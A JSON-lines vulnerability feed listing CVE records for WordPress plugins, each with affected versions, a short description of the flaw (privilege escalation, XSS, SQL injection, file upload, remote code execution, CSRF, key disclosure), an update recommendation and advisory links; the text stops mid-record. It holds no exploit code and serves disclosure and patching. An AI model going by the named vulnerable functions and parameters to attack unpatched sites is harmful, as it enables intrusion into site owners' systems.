{"CVE_ID":"CVE-2025-3418","slug":"wpc-admin-columns","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The WPC Admin Columns plugin for WordPress is vulnerable to privilege escalation in versions 2.0.6 to 2.1.0. This is due to the plugin not properly restricting user meta values that can be updated through the ajax_edit_save() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to that of an administrator.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3269302\\\/wpc-admin-columns\\\/trunk\\\/includes\\\/class-backend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3269302\\\/wpc-admin-columns\\\/trunk\\\/includes\\\/class-backend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6145e2d7-c917-4814-a13e-6d34088cb784?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6145e2d7-c917-4814-a13e-6d34088cb784?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5450","slug":"bug-library","versionImpact":"2.1","versionEndExcluding":"2.1.1","description":"The Bug Library WordPress plugin before 2.1.1 does not check the file type on user-submitted bug reports, allowing an unauthenticated user to upload PHP files","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d91217bc-9f8f-4971-885e-89edc45b2a4d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d91217bc-9f8f-4971-885e-89edc45b2a4d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9879","slug":"website-file-changes-monitor","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The Melapress File Monitor WordPress plugin before 2.1.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cda54097-4aec-472e-a73f-31ecb76ebb23\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cda54097-4aec-472e-a73f-31ecb76ebb23\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12448","slug":"posts-and-products-views","versionImpact":"2.1","versionEndExcluding":"2.1.1","description":"The Posts and Products Views for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'papvfwc_views' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posts-and-products-views\\\/trunk\\\/posts-and-products-views-for-woocommerce.php#L169\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posts-and-products-views\\\/trunk\\\/posts-and-products-views-for-woocommerce.php#L169\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posts-and-products-views\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posts-and-products-views\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7e27a6c-8b14-459b-aba2-044f311edf9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7e27a6c-8b14-459b-aba2-044f311edf9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11383","slug":"cc-canadian-mortgage-calculator","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The CC Canadian Mortgage Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cc-mortgage-canada' shortcode in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216591%40cc-canadian-mortgage-calculator&new=3216591%40cc-canadian-mortgage-calculator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216591%40cc-canadian-mortgage-calculator&new=3216591%40cc-canadian-mortgage-calculator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0654e3c9-106d-4d90-a4e4-9705c36f7564?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0654e3c9-106d-4d90-a4e4-9705c36f7564?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9234","slug":"gutenkit-blocks-addon","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The GutenKit \u2013 Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function  (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44c5dc0-6bf6-417a-9383-b345ff57ac32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44c5dc0-6bf6-417a-9383-b345ff57ac32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-gutenkit-blocks-addon\\\/blob\\\/dc3738bb821cf1d93a11379b8695793fa5e1b9e6\\\/gutenkit-blocks-addon\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php#L76\",\"name\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-gutenkit-blocks-addon\\\/blob\\\/dc3738bb821cf1d93a11379b8695793fa5e1b9e6\\\/gutenkit-blocks-addon\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenkit-blocks-addon\\\/tags\\\/2.1.0\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php?rev=3159783#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenkit-blocks-addon\\\/tags\\\/2.1.0\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php?rev=3159783#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenkit-blocks-addon\\\/tags\\\/2.1.1\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php?rev=3164886\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenkit-blocks-addon\\\/tags\\\/2.1.1\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php?rev=3164886\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7848","slug":"user-private-files","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The User Private Files \u2013 WordPress File Sharing Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.0 via the 'dpk_upvf_update_doc' due to missing validation on the 'docid' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to gain access to other user's private files.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb06de8-97d6-46c3-83ef-93a209540259?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb06de8-97d6-46c3-83ef-93a209540259?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3136913%40user-private-files&new=3136913%40user-private-files&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3136913%40user-private-files&new=3136913%40user-private-files&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2842","slug":"wp-inventory-manager","versionEndExcluding":"2.1.0.14","description":"The WP Inventory Manager WordPress plugin before 2.1.0.14 does not have CSRF checks, which could allow attackers to make logged-in admins delete Inventory Items via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0357ecc7-56f5-4843-a928-bf2d3ce75596\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0357ecc7-56f5-4843-a928-bf2d3ce75596\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2123","slug":"wp-inventory-manager","versionEndExcluding":"2.1.0.13","description":"The WP Inventory Manager WordPress plugin before 2.1.0.13 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44448888-cd5d-482e-859e-123e442ce5c1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44448888-cd5d-482e-859e-123e442ce5c1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/daniloalbuqrque\\\/poc-cve-xss-encoded-wp-inventory-manager-plugin\",\"name\":\"https:\\\/\\\/github.com\\\/daniloalbuqrque\\\/poc-cve-xss-encoded-wp-inventory-manager-plugin\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1806","slug":"wp-inventory-manager","versionEndExcluding":"2.1.0.12","description":"The WP Inventory Manager WordPress plugin before 2.1.0.12 does not sanitise and escape the message parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as administrators.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38d99c7d-2d10-4910-b95a-1cb545b813c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38d99c7d-2d10-4910-b95a-1cb545b813c4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4085","slug":"docollipics-faustball-de","versionImpact":"2.0.4","versionEndExcluding":"2.1.0","description":"The Tabellen von faustball.com plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7417e25-be35-4134-9d38-f8ee91f0d1cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7417e25-be35-4134-9d38-f8ee91f0d1cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078169%40docollipics-faustball-de%2Ftrunk&old=3076848%40docollipics-faustball-de%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078169%40docollipics-faustball-de%2Ftrunk&old=3076848%40docollipics-faustball-de%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10009","slug":"website-file-changes-monitor","versionImpact":"2.0.2","versionEndExcluding":"2.1.0","description":"The Melapress File Monitor WordPress plugin before 2.1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2b1f9f4-d5f3-4975-afd1-50eaf193e2ab\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2b1f9f4-d5f3-4975-afd1-50eaf193e2ab\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13321","slug":"analyticswp","versionImpact":"2.0.0","versionEndExcluding":"2.1.0","description":"The AnalyticsWP plugin for WordPress is vulnerable to SQL Injection via the 'custom_sql' parameter in all versions up to, and including, 2.0.0 due to insufficient authorization checks on the handle_get_stats() function.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/analyticswp.com\\\/\",\"name\":\"https:\\\/\\\/analyticswp.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6507318-92c0-457c-8c87-2d023428a77f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6507318-92c0-457c-8c87-2d023428a77f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36834","slug":"woo-discount-rules","versionImpact":"2.0.2","versionEndExcluding":"2.1.0","description":"The Discount Rules for WooCommerce plugin for WordPress is vulnerable to missing authorization via several AJAX actions in versions up to, and including, 2.0.2 due to missing capability checks on various functions. This makes it possible for subscriber-level attackers to execute various actions and perform a wide variety of actions such as modifying rules and saving configurations.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cf27ba-a01b-4e34-9584-b1d3fc87af34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cf27ba-a01b-4e34-9584-b1d3fc87af34?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-vulnerabilities-in-discount-rules-for-woocommerce-plugin\\\/\",\"name\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-vulnerabilities-in-discount-rules-for-woocommerce-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7714","slug":"ays-chatgpt-assistant","versionImpact":"2.0.9","versionEndExcluding":"2.1.0","description":"The AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0 lacks sufficient access controls allowing an unauthenticated user to disconnect the AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0 from OpenAI, thereby disabling the AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0. Multiple actions are accessible: 'ays_chatgpt_disconnect', 'ays_chatgpt_connect', and  'ays_chatgpt_save_feedback'","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04447c76-a61b-4091-a510-c76fc8ca5664\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04447c76-a61b-4091-a510-c76fc8ca5664\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7713","slug":"ays-chatgpt-assistant","versionImpact":"2.0.9","versionEndExcluding":"2.1.0","description":"The AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0 discloses the Open AI API Key, allowing unauthenticated users to obtain it","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/061eab97-4a84-4738-a1e8-ef9a1261ff73\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/061eab97-4a84-4738-a1e8-ef9a1261ff73\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12525","slug":"easy-mls-listings-import","versionImpact":"2.0.1","versionEndExcluding":"2.1.0","description":"The Easy MLS Listings Import plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-featured-listings' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-mls-listings-import\\\/trunk\\\/includes\\\/class-homeasap-featured-listings-loader.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-mls-listings-import\\\/trunk\\\/includes\\\/class-homeasap-featured-listings-loader.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6351a40d-523d-4edb-acba-5cf048a1014f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6351a40d-523d-4edb-acba-5cf048a1014f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9377","slug":"export-woocommerce","versionImpact":"2.0.15","versionEndExcluding":"2.1.0","description":"The Products, Order & Customers Export for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.15. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67d2e1c7-dbd3-4195-8bdb-3b85b25bfa52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67d2e1c7-dbd3-4195-8bdb-3b85b25bfa52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164996\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164996\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-woocommerce\\\/tags\\\/2.0.15\\\/includes\\\/class-alg-wc-export-core.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-woocommerce\\\/tags\\\/2.0.15\\\/includes\\\/class-alg-wc-export-core.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-woocommerce\\\/tags\\\/2.0.15\\\/includes\\\/class-alg-wc-export-core.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-woocommerce\\\/tags\\\/2.0.15\\\/includes\\\/class-alg-wc-export-core.php#L216\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4567","slug":"themify-shortcodes","versionImpact":"2.0.9","versionEndExcluding":"2.1.0","description":"The Themify Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's themify_button shortcode in all versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c63ff9d7-6a14-4186-8550-4e5c50855e7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c63ff9d7-6a14-4186-8550-4e5c50855e7f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082885\\\/themify-shortcodes\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082885\\\/themify-shortcodes\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0588","slug":"catalyst-connect-client-portal","versionEndExcluding":"2.1.0","description":"The Catalyst Connect Zoho CRM Client Portal WordPress plugin before 2.1.0 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84be272e-0891-461c-91ad-496b64f92f8f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84be272e-0891-461c-91ad-496b64f92f8f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0535","slug":"donations-block","versionEndExcluding":"2.1.0","description":"The Donation Block For PayPal WordPress plugin before 2.1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c50321a-dba8-4379-9b9c-4c349e44b2ed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c50321a-dba8-4379-9b9c-4c349e44b2ed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5396","slug":"bears-backup","versionImpact":"2.0.0","versionEndExcluding":"2.1.0","description":"The Bears Backup plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.0. This is due to the bbackup_ajax_handle() function not having a capability check, nor validating user supplied input passed directly to call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server, which can be leveraged to inject backdoors or create new administrative user accounts, to name a few things. On WordPress sites running the Alone theme versions 7.8.4 and older, this can be chained with CVE-2025-5394 to install the Bears Backup plugin and achieve the same impact.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/alone-charity-multipurpose-nonprofit-wordpress-theme\\\/15019939\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/alone-charity-multipurpose-nonprofit-wordpress-theme\\\/15019939\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81b44abb-6d30-4930-b68b-9a04d93f5169?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81b44abb-6d30-4930-b68b-9a04d93f5169?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2013-10026","slug":"mail-subscribe-list","versionEndExcluding":"2.1","description":"A vulnerability, which was classified as problematic, has been found in Mail Subscribe List Plugin up to 2.0.10 on WordPress. This issue affects some unknown processing of the file index.php. The manipulation of the argument sml_name\/sml_email leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.1 is able to address this issue. The name of the patch is 484970ef8285cae51d2de3bd4e4684d33c956c28. It is recommended to upgrade the affected component. The identifier VDB-227765 was assigned to this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227765\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227765\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/mail-subscribe-list\\\/commit\\\/484970ef8285cae51d2de3bd4e4684d33c956c28\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/mail-subscribe-list\\\/commit\\\/484970ef8285cae51d2de3bd4e4684d33c956c28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227765\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227765\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11334","slug":"my-contador-wp","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The My Contador lesr plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportar_registros() function in all versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to export user data.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-contador-wp\\\/trunk\\\/contador.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-contador-wp\\\/trunk\\\/contador.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191748\\\/my-contador-wp\\\/trunk\\\/contador.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191748\\\/my-contador-wp\\\/trunk\\\/contador.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cfeff9-7079-408e-9c22-bae0d45000ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cfeff9-7079-408e-9c22-bae0d45000ed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10480","slug":"3dprint-lite","versionImpact":"2.0.9.9","versionEndExcluding":"2.1","description":"The 3DPrint Lite WordPress plugin before 2.1 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/725ac766-c849-49d6-a968-58fcc2e134c8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/725ac766-c849-49d6-a968-58fcc2e134c8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4536","slug":"ip-vault-wp-firewall","versionImpact":"1.1","versionEndExcluding":"2.1","description":"The IP Vault \u2013 WP Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66e89753-f83e-4e60-b165-6d3d101d6c59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66e89753-f83e-4e60-b165-6d3d101d6c59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2922250%40ip-vault-wp-firewall&new=2922250%40ip-vault-wp-firewall&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2922250%40ip-vault-wp-firewall&new=2922250%40ip-vault-wp-firewall&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5362","slug":"spice-post-slider","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The Carousel, Recent Post Slider and Banner Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'spice_post_slider' shortcode in versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1, or a newer patched 